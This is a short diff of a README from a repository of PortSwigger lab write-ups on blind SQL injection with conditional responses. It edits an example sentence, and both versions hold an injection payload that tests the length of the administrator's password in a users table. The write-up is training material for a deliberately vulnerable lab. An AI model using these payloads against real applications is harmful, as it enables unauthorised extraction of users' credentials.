shantanuumrani1109/PortSwigger-Labs/SQL-Injection/Lab: Blind SQL injection with conditional responses/README.md

 This confirms that the password is greater than 1

-If we send the value as  50 ie `' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>50)='a`  , we dont get any welcome message which means its not > 50  characters.
+If we send the value as 1 ie `' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)=1)='a`  , we dont get any welcome message which means its more than 1  characters.

 ![image]()